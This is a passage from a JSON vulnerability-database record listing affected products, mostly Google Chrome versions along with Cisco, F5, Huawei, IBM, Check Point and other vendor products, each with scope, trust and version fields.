"version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.13" }, { "model": "secureplatform ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.578.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.54" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.63" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.29" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.0" }, { "model": "agile controller v100r001c00spc205", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.380.0" }, { "model": "cloud single sign on", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.809.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "mds", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "gaia embedded r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.361.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1018" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.701.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.780.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.116" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.605.0" }, { "model": "t620 plus flexible dual core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1051.0" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.51" }, { "model": "ipso r71.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "secure access link policy server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.49" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.55" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.663.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.537.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "phaser r14-12 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6700081.140.105.00700" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1275.0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.96" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1046.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.122" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "t610 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1062" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.934.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1020" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.469.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.9" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1080.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.67" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace uc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "2054-e11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "secureplatform r70.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.951.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.55" }, { "model": "gaia r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7775061.090.225.06200" }, { "model": "oceanstor s2200t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.0" }, { "model": "netflow collection agent", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.130" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.414.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.332" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.85" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.108" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1050.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.479.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.11" }, { "model": "oceanstor s5600 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.960.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.838.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.394.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1" }, { "model": "oceanstor s2600 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.718.0" }, { "model": "secureplatform r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "uma-db v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.1" }, { "model": "oceanstor s2200t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "service control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.528.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "rack server rh2288e v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.100" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.62" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491064" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "sal gw virtual app", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.25" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1023.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.325.0" }, { "model": "high-density server xh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.33" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.57" }, { "model": "secure access core concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.46" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.724.0" }, { "model": "oceanstor hdp3500e v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.431.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.10" }, { "model": "configuration and orchestration manager com", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.47" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.51" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.406.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.938.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.515.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.36" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.2.1" }, { "model": "fusionaccess v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.91275" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.409.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.68" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.4" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.315.0" }, { "model": "network convergence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.741.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.170.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.588.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "galax8800 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1045.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.799.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.104" }, { "model": "secureplatform r77.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1073.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.792.0" }, { "model": "secureplatform r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "ipso r71.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "storefabric c-series mds switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "gaia embedded r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.9" }, { "model": "uma v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.21" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "omm solution v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.322" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1279.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.272.0" }, { "model": "secureplatform r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.97" }, { "model": "gaia embedded ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "associates application performance management", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.411.0" }, { "model": "oceanstor vtl6000 v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "elog v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.367.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1045" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1016" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.454.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.53" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "oceanstor s5800t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1029.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.7" }, { "model": "chrome", "scope": "eq", "trust": 